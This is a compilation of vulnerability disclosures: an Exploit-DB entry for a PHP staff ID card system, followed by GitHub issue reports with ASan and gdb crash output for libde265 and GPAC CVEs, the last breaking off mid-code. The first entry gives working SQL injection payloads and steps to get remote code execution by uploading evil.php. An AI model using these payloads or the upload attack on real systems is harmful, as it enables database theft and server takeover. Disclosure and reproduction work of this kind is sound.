In Sourcecodetester Printable Staff ID Card Creator System 1.0 after compromising the database via SQLi, an attacker can log in and leverage an arbitrary file upload vulnerability to obtain remote code execution.

    # Exploit Title: Printable Staff ID Card Creator System 1.0 - SQLi & RCE via Arbitrary File Upload
    # Date: 2021-05-16
    # Exploit Author : bwnz
    # Software Link: https://www.sourcecodester.com/php/12802/php-staff-id-card-creation-and-printing-system.html
    # Version: 1.0
    # Tested on: Ubuntu 20.04.2 LTS
    
    # Printable Staff ID Card Creator System is vulnerable to an unauthenticated SQL Injection attack.
    # After compromising the database via SQLi, an attacker can log in and leverage an arbitrary file upload
    # vulnerability to obtain remote code execution.
    
    
    -----SQL Injection-----
    Step 1.) Navigate to the login page and populate the email and password fields.
    Step 2.) With Burp Suite running, send and capture the request.
    Step 3.) Within Burp Suite, right click and "Save item" in preparation for putting the request through SQLMap.
    Step 4.) Open a terminal and run the following command:
    	sqlmap -r <saved item>
    
    Below are the SQLMap results
    
    Parameter: user_email (POST)
       	 Type: boolean-based blind
        Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
        Payload: user_email=test@test.com' RLIKE (SELECT (CASE WHEN (9007=9007) THEN 0x7465737440746573742e636f6d ELSE 0x28 END))-- JaaE&password=`&login_button=
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: user_email=test@test.com' AND (SELECT 7267 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(7267=7267,1))),0x7162716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pCej&password=`&login_button=
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: user_email=test@test.com' AND (SELECT 2884 FROM (SELECT(SLEEP(5)))KezZ)-- bBqz&password=`&login_button=
    ----- END -----
    
    
    ----- Authenticated RCE via Arbitrary File Upload -----
    # For this attack,  it is assumed that you've obtained credentials via the SQL Injection attack above and have logged in.
    
    Step 1.) After logging in, click the "Initialization" option and "Add System Info".
    Step 2.) Populate the blank form with arbitrary data. At the bottom of the form, there is an option to upload a logo. Upload your evil.php file here and click "Finish".
    Step 3.) By default, the file is uploaded to http://<IP>/Staff_registration/media/evil.php. Navigate to it for RCE.
    ----- END ------

CVE-2021-45411: Offensive Security’s Exploit Database Archive

An issue was discovered in libde265 v1.0.8.There is a Heap-use-after-free in intrapred.h when decoding file using dec265.

Hello,  
A Heap-use-after-free has occurred when running program dec265  
System info：  
Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0

Dec265 v1.0.8

poc.zip

Verification steps：  
1.Get the source code of libde265  
2.Compile

    cd libde265
    mkdir build && cd build
    cmake ../ -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_CXX_FLAGS="fsanitize=address"
    make -j 32
    

3.run dec265

asan info

    =================================================================
    ==1538158==ERROR: AddressSanitizer: heap-use-after-free on address 0x625000007e04 at pc 0x7efe5f2b9526 bp 0x7ffceaaa13c0 sp 0x7ffceaaa13b0
    READ of size 4 at 0x625000007e04 thread T0
        #0 0x7efe5f2b9525 in intra_border_computer<unsigned char>::fill_from_image() /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.h:552
        #1 0x7efe5f2ba6e9 in void fill_border_samples<unsigned char>(de265_image*, int, int, int, int, unsigned char*) /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.cc:260
        #2 0x7efe5f2ba6e9 in void decode_intra_prediction_internal<unsigned char>(de265_image*, int, int, IntraPredMode, unsigned char*, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.cc:284
        #3 0x7efe5f2a5383 in decode_intra_prediction(de265_image*, int, int, IntraPredMode, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.cc:335
        #4 0x7efe5f31dc52 in decode_TU /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:3453
        #5 0x7efe5f342e76 in read_transform_unit(thread_context*, int, int, int, int, int, int, int, int, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:3665
        #6 0x7efe5f347191 in read_transform_tree(thread_context*, int, int, int, int, int, int, int, int, int, int, int, PredMode, unsigned char, unsigned char) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:3942
        #7 0x7efe5f34e119 in read_coding_unit(thread_context*, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:4575
        #8 0x7efe5f3548f2 in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:4652
        #9 0x7efe5f354357 in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:4635
        #10 0x7efe5f356564 in decode_substream(thread_context*, bool, bool) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:4741
        #11 0x7efe5f358ddb in read_slice_segment_data(thread_context*) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:5054
        #12 0x7efe5f23dd75 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:843
        #13 0x7efe5f240c0f in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:945
        #14 0x7efe5f241715 in decoder_context::decode_some(bool*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:730
        #15 0x7efe5f24695e in decoder_context::decode(int*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:1329
        #16 0x55990c1348fd in main /home/dh/sda3/libde265-master/libde265-master/dec265/dec265.cc:764
        #17 0x7efe5ed950b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #18 0x55990c13776d in _start (/home/dh/sda3/libde265-master/libde265-master/dec265+0xa76d)
    
    0x625000007e04 is located 1284 bytes inside of 8600-byte region [0x625000007900,0x625000009a98)
    freed by thread T0 here:
        #0 0x7efe5f6408df in operator delete(void*) (/lib/x86_64-linux-gnu/libasan.so.5+0x1108df)
        #1 0x7efe5f24b576 in std::_Sp_counted_ptr_inplace<pic_parameter_set, std::allocator<pic_parameter_set>, (__gnu_cxx::_Lock_policy)2>::_M_destroy() /usr/include/c++/9/ext/new_allocator.h:128
        #2 0x7efe5f4d996f  (/home/dh/sda3/libde265-master/libde265-master/build/libde265/liblibde265.so+0x37d96f)
    
    previously allocated by thread T0 here:
        #0 0x7efe5f63f947 in operator new(unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10f947)
        #1 0x7efe5f22cf3f in std::shared_ptr<pic_parameter_set> std::make_shared<pic_parameter_set>() /usr/include/c++/9/ext/new_allocator.h:114
        #2 0x7efe5f22cf3f in decoder_context::read_pps_NAL(bitreader&) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:572
        #3 0x7efe5b1ff7ff  (<unknown module>)
        #4 0x614fffffffff  (<unknown module>)
    
    SUMMARY: AddressSanitizer: heap-use-after-free /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.h:552 in intra_border_computer<unsigned char>::fill_from_image()
    Shadow bytes around the buggy address:
      0x0c4a7fff8f70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff8f80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff8f90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff8fa0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff8fb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
    =>0x0c4a7fff8fc0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff8fd0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff8fe0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff8ff0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9000: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9010: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1538158==ABORTING

CVE-2021-36408: Heap-use-after-free in intrapred.h when decoding file · Issue #299 · strukturag/libde265

A stack-buffer-overflow exists in libde265 v1.0.8 via fallback-motion.cc in function put_epel_hv_fallback when running program dec265.

Hello,  
A stack-buffer-overflow has occurred when running program dec265  
System info：  
Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0

Dec265 v1.0.8

poc (4).zip

Verification steps：  
1.Get the source code of libde265  
2.Compile

    cd libde265
    mkdir build && cd build
    cmake ../ -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_CXX_FLAGS="fsanitize=address"
    make -j 32
    

3.run dec265

asan info

    =================================================================
    ==1262407==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffeacbd65e3 at pc 0x7ff9ff7de308 bp 0x7ffeacbd3f00 sp 0x7ffeacbd3ef0
    READ of size 2 at 0x7ffeacbd65e3 thread T0
        #0 0x7ff9ff7de307 in void put_epel_hv_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, int, int, short*, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/fallback-motion.cc:352
        #1 0x7ff9ff830067 in acceleration_functions::put_hevc_epel_hv(short*, long, void const*, long, int, int, int, int, short*, int) const /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/acceleration.h:328
        #2 0x7ff9ff830067 in void mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/motion.cc:254
        #3 0x7ff9ff8262ab in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/motion.cc:388
        #4 0x7ff9ff828626 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/motion.cc:2107
        #5 0x7ff9ff89c8aa in read_coding_unit(thread_context*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:4314
        #6 0x7ff9ff8a48f2 in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:4652
        #7 0x7ff9ff8a4e43 in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:4638
        #8 0x7ff9ff8a4ace in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:4645
        #9 0x7ff9ff8a4db9 in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:4641
        #10 0x7ff9ff8a6564 in decode_substream(thread_context*, bool, bool) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:4741
        #11 0x7ff9ff8a8ddb in read_slice_segment_data(thread_context*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/slice.cc:5054
        #12 0x7ff9ff78dd75 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/decctx.cc:843
        #13 0x7ff9ff790c0f in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/decctx.cc:945
        #14 0x7ff9ff791715 in decoder_context::decode_some(bool*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/decctx.cc:730
        #15 0x7ff9ff7949bb in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/decctx.cc:688
        #16 0x7ff9ff795839 in decoder_context::decode_NAL(NAL_unit*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/decctx.cc:1230
        #17 0x7ff9ff796e1e in decoder_context::decode(int*) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/decctx.cc:1318
        #18 0x5573510028fd in main /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/dec265/dec265.cc:764
        #19 0x7ff9ff2e50b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #20 0x55735100576d in _start (/home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/out/dec265-afl+++0xa76d)
    
    Address 0x7ffeacbd65e3 is located in stack of thread T0 at offset 9315 in frame
        #0 0x7ff9ff82e67f in void mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/motion.cc:174
    
      This frame has 2 object(s):
        [32, 9120) 'mcbuffer' (line 200)
        [9392, 14752) 'padbuf' (line 222) <== Memory access at offset 9315 underflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/fallback-motion.cc:352 in void put_epel_hv_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, int, int, short*, int)
    Shadow bytes around the buggy address:
      0x100055972c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100055972c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100055972c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100055972c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100055972ca0: 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
    =>0x100055972cb0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2[f2]f2 f2 f2
      0x100055972cc0: f2 f2 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00
      0x100055972cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100055972ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100055972cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100055972d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1262407==ABORTING

CVE-2021-36410: stack-buffer-overflow in fallback-motion.cc when decoding file · Issue #301 · strukturag/libde265

There is an Assertion `scaling_list_pred_matrix_id_delta==1' failed at sps.cc:925 in libde265 v1.0.8 when decoding file, which allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file or possibly have unspecified other impact.

Hello,  
There is an Assertion \`scaling\_list\_pred\_matrix\_id\_delta==1' failed at sps.cc:925 in libde265 v1.0.8 when decoding file.  
System info：  
Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0

Dec265 v1.0.8

poc (3).zip

Verification steps：  
1.Get the source code of libde265  
2.Compile

    cd libde265
    mkdir build && cd build
    cmake ../ -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_CXX_FLAGS="fsanitize=address"
    make -j 16
    

3.run dec265

Output

    WARNING: non-existing PPS referenced
    dec265: /home/dh/sda3/libde265-master/libde265-master/libde265/sps.cc:925: de265_error read_scaling_list(bitreader*, const seq_parameter_set*, scaling_list_data*, bool): Assertion `scaling_list_pred_matrix_id_delta==1' failed.
    Aborted(core dumped)
    
    

gdb info

    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    WARNING: non-existing PPS referenced
    dec265-afl++: /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/sps.cc:925: de265_error read_scaling_list(bitreader*, const seq_parameter_set*, scaling_list_data*, bool): Assertion `scaling_list_pred_matrix_id_delta==1' failed.
    
    Program received signal SIGABRT, Aborted.
    [----------------------------------registers-----------------------------------]
    RAX: 0x0 
    RBX: 0x7ffff6c3a680 (0x00007ffff6c3a680)
    RCX: 0x7ffff6e0618b (<__GI_raise+203>:	mov    rax,QWORD PTR [rsp+0x108])
    RDX: 0x0 
    RSI: 0x7fffffff1ab0 --> 0x0 
    RDI: 0x2 
    RBP: 0x7ffff6f7b588 ("%s%s%s:%u: %s%sAssertion `%s' failed.\n%n")
    RSP: 0x7fffffff1ab0 --> 0x0 
    RIP: 0x7ffff6e0618b (<__GI_raise+203>:	mov    rax,QWORD PTR [rsp+0x108])
    R8 : 0x0 
    R9 : 0x7fffffff1ab0 --> 0x0 
    R10: 0x8 
    R11: 0x246 
    R12: 0x7ffff7538760 ("/home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/sps.cc")
    R13: 0x39d 
    R14: 0x7ffff75388a0 ("scaling_list_pred_matrix_id_delta==1")
    R15: 0x0
    EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x7ffff6e0617f <__GI_raise+191>:	mov    edi,0x2
       0x7ffff6e06184 <__GI_raise+196>:	mov    eax,0xe
       0x7ffff6e06189 <__GI_raise+201>:	syscall 
    => 0x7ffff6e0618b <__GI_raise+203>:	mov    rax,QWORD PTR [rsp+0x108]
       0x7ffff6e06193 <__GI_raise+211>:	xor    rax,QWORD PTR fs:0x28
       0x7ffff6e0619c <__GI_raise+220>:	jne    0x7ffff6e061c4 <__GI_raise+260>
       0x7ffff6e0619e <__GI_raise+222>:	mov    eax,r8d
       0x7ffff6e061a1 <__GI_raise+225>:	add    rsp,0x118
    [------------------------------------stack-------------------------------------]
    0000| 0x7fffffff1ab0 --> 0x0 
    0008| 0x7fffffff1ab8 --> 0x7ffff768f6f0 (<free>:	endbr64)
    0016| 0x7fffffff1ac0 --> 0xe4e4e4e3fbad8000 
    0024| 0x7fffffff1ac8 --> 0x612000000040 --> 0x612d353606800001 
    0032| 0x7fffffff1ad0 --> 0x6120000000a5 ("265_error read_scaling_list(bitreader*, const seq_parameter_set*, scaling_list_data*, bool): Assertion `scaling_list_pred_matrix_id_delta==1' failed.\n")
    0040| 0x7fffffff1ad8 --> 0x612000000040 --> 0x612d353606800001 
    0048| 0x7fffffff1ae0 --> 0x612000000040 --> 0x612d353606800001 
    0056| 0x7fffffff1ae8 --> 0x61200000013b --> 0x0 
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGABRT
    __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50
    50	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    
    

source code of sps.cc:925

    912 if (scaling_list_pred_matrix_id_delta==0) {
    913         if (sizeId==0) {
    914           memcpy(curr_scaling_list, default_ScalingList_4x4, 16);
    915          }
    916         else {
    917            if (canonicalMatrixId<3)
    918              { memcpy(curr_scaling_list, default_ScalingList_8x8_intra,64); }
    919            else
    920              { memcpy(curr_scaling_list, default_ScalingList_8x8_inter,64); }
    921          }
    922        }
    923        else {
    924          // TODO: CHECK: for sizeID=3 and the second matrix, should we have delta=1 or delta=3 ?
    925          if (sizeId==3) { assert(scaling_list_pred_matrix_id_delta==1); }
    926
    927          int mID = matrixId - scaling_list_pred_matrix_id_delta;
    928
    929          int len = (sizeId == 0 ? 16 : 64);
    930          memcpy(curr_scaling_list, scaling_list[mID], len);
    931
    932          scaling_list_dc_coef       = dc_coeff[sizeId][mID];
    933          dc_coeff[sizeId][matrixId] = dc_coeff[sizeId][mID];
    934        }
    935      }

CVE-2021-36409: There is an Assertion failed at sps.cc · Issue #300 · strukturag/libde265

An issue has been found in libde265 v1.0.8 due to incorrect access control. A SEGV caused by a READ memory access in function derive_boundaryStrength of deblock.cc has occurred. The vulnerability causes a segmentation fault and application crash, which leads to remote denial of service.

Hello,  
A SEGV of deblock.cc in function derive\_boundaryStrength has occurred when running program dec265，

source code

    283 if ((edgeFlags & transformEdgeMask) &&
    284              (img->get_nonzero_coefficient(xDi   ,yDi) ||
    285               img->get_nonzero_coefficient(xDiOpp,yDiOpp))) {
    286            bS = 1;
    287          }
    288          else {
    289
    290            bS = 0;
    291
    292            const PBMotion& mviP = img->get_mv_info(xDiOpp,yDiOpp);
    293            const PBMotion& mviQ = img->get_mv_info(xDi   ,yDi);
    294
    295            slice_segment_header* shdrP = img->get_SliceHeader(xDiOpp,yDiOpp);
    296            slice_segment_header* shdrQ = img->get_SliceHeader(xDi   ,yDi);
    297
    298            int refPicP0 = mviP.predFlag[0] ? shdrP->RefPicList[0][ mviP.refIdx[0] ] : -1;
    299            int refPicP1 = mviP.predFlag[1] ? shdrP->RefPicList[1][ mviP.refIdx[1] ] : -1;
    300            int refPicQ0 = mviQ.predFlag[0] ? shdrQ->RefPicList[0][ mviQ.refIdx[0] ] : -1;
    301            int refPicQ1 = mviQ.predFlag[1] ? shdrQ->RefPicList[1][ mviQ.refIdx[1] ] : -1;
    302
    303            bool samePics = ((refPicP0==refPicQ0 && refPicP1==refPicQ1) ||
    304                             (refPicP0==refPicQ1 && refPicP1==refPicQ0));
    

**Due to incorrect access control, a SEGV caused by a READ memory access occurred at line 298 of the code. This issue can cause a Denial of Service attack.**

System info：  
Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0

Dec265 v1.0.8

poc.zip

Verification steps：  
1.Get the source code of libde265  
2.Compile

    cd libde265
    mkdir build && cd build
    cmake ../ -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_CXX_FLAGS="fsanitize=address"
    make -j 32
    

3.run dec265(without asan)

Output

    WARNING: end_of_sub_stream_one_bit not set to 1 when it should be
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: CTB outside of image area (concealing stream error...)
    Segmentation fault(core dumped)
    
    

AddressSanitizer output

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==3532158==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000003d0 (pc 0x7f19b4f52978 bp 0x616000001580 sp 0x7fff00e87c20 T0)
    ==3532158==The signal is caused by a READ memory access.
    ==3532158==Hint: address points to the zero page.
        #0 0x7f19b4f52977 in derive_boundaryStrength(de265_image*, bool, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/deblock.cc:298
        #1 0x7f19b4f56835 in apply_deblocking_filter(de265_image*) /home/dh/sda3/libde265-master/libde265-master/libde265/deblock.cc:1046
        #2 0x7f19b4f7e626 in decoder_context::run_postprocessing_filters_sequential(de265_image*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:1880
        #3 0x7f19b4f9baa0 in decoder_context::decode_some(bool*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:769
        #4 0x7f19b4f9f95e in decoder_context::decode(int*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:1329
        #5 0x55704ed8c8fd in main /home/dh/sda3/libde265-master/libde265-master/dec265/dec265.cc:764
        #6 0x7f19b4aee0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #7 0x55704ed8f76d in _start (/home/dh/sda3/libde265-master/libde265-master/dec265+0xa76d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/dh/sda3/libde265-master/libde265-master/libde265/deblock.cc:298 in derive_boundaryStrength(de265_image*, bool, int, int, int, int)
    ==3532158==ABORTING
    
    
    
    

gdb info

    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    WARNING: end_of_sub_stream_one_bit not set to 1 when it should be
    WARNING: non-existing reference picture accessed
    WARNING: non-existing reference picture accessed
    WARNING: non-existing reference picture accessed
    WARNING: non-existing reference picture accessed
    WARNING: non-existing reference picture accessed
    WARNING: non-existing reference picture accessed
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: CTB outside of image area (concealing stream error...)
    
    Program received signal SIGSEGV, Segmentation fault.
    [----------------------------------registers-----------------------------------]
    RAX: 0x0 
    RBX: 0x2 
    RCX: 0x61b000001580 --> 0xbebebebe00000000 
    RDX: 0x0 
    RSI: 0x7a ('z')
    RDI: 0x3d0 
    RBP: 0x616000001580 --> 0xbebebebe00000007 
    RSP: 0x7fffffff36e0 --> 0x3000000000 --> 0x0 
    RIP: 0x7ffff724b978 (<derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6024>:	mov    ebx,DWORD PTR [r9+r15*4+0x3b8])
    R8 : 0x3 
    R9 : 0x0 
    R10: 0x6330000d6800 --> 0x8ffff00000101 
    R11: 0x6330000d6200 --> 0x60101 
    R12: 0x0 
    R13: 0xffffffffffffff90 
    R14: 0x7ffff31ff800 --> 0xbebebebebebebebe 
    R15: 0x6
    EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x7ffff724b96e <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6014>:	
        jl     0x7ffff724b978 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6024>
       0x7ffff724b970 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6016>:	test   dl,dl
       0x7ffff724b972 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6018>:	
        jne    0x7ffff724dd87 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+15255>
    => 0x7ffff724b978 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6024>:	mov    ebx,DWORD PTR [r9+r15*4+0x3b8]
       0x7ffff724b980 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6032>:	mov    edx,0x376d
       0x7ffff724b985 <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6037>:	mov    eax,0xafce
       0x7ffff724b98a <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6042>:	lea    r15,[r11+0x1]
       0x7ffff724b98e <derive_boundaryStrength(de265_image*, bool, int, int, int, int)+6046>:	mov    rdi,r15
    [------------------------------------stack-------------------------------------]
    0000| 0x7fffffff36e0 --> 0x3000000000 --> 0x0 
    0008| 0x7fffffff36e8 --> 0x6160000016f8 --> 0x4000000080 --> 0x0 
    0016| 0x7fffffff36f0 --> 0x6160000016e8 --> 0x625000057900 --> 0x0 
    0024| 0x7fffffff36f8 --> 0xa000000080 --> 0x0 
    0032| 0x7fffffff3700 --> 0x1 
    0040| 0x7fffffff3708 --> 0xbf000000c0 --> 0x0 
    0048| 0x7fffffff3710 --> 0x61600000167c --> 0x4000000003 --> 0x0 
    0056| 0x7fffffff3718 --> 0xff00f800 --> 0x0 
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGSEGV
    0x00007ffff724b978 in derive_boundaryStrength (img=img@entry=0x616000001580, 
        vertical=vertical@entry=0x0, yStart=yStart@entry=0x0, 
        yEnd=<optimized out>, xStart=xStart@entry=0x0, xEnd=<optimized out>)
        at /home/dh/sda3/AFLplusplus/libde265-master/libde265-master-afl++/libde265/deblock.cc:298
    298	            int refPicP0 = mviP.predFlag[0] ? shdrP->RefPicList[0][ mviP.refIdx[0] ] : -1;

CVE-2021-36411: A SEGV has occurred when running program dec265 · Issue #302 · strukturag/libde265

A heab-based buffer overflow vulnerability exists in MP4Box in GPAC 1.0.1 via media.c, which allows attackers to cause a denial of service or execute arbitrary code via a crafted file.

Hello,  
A heap-buffer-overflow has occurred when running program MP4Box,which leads to a Deny of Service caused by dividing zero without sanity check,this can reproduce on the lattest commit.  
System info：  
Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0

poc.zip

file: media.c  
function:gf\_isom\_get\_3gpp\_audio\_esd  
line: 105  
As below code shows:

    97		gf_bs_write_data(bs, "\x41\x6D\x7F\x5E\x15\xB1\xD0\x11\xBA\x91\x00\x80\x5F\xB4\xB9\x7E", 16);
    98		gf_bs_write_u16_le(bs, 1);
    99		memset(szName, 0, 80);
    100		strcpy(szName, "QCELP-13K(GPAC-emulated)");
    101		gf_bs_write_data(bs, szName, 80);
    102		ent = &stbl->TimeToSample->entries[0];
    103		sample_rate = entry->samplerate_hi;
    104		block_size = ent ? ent->sampleDelta : 160;
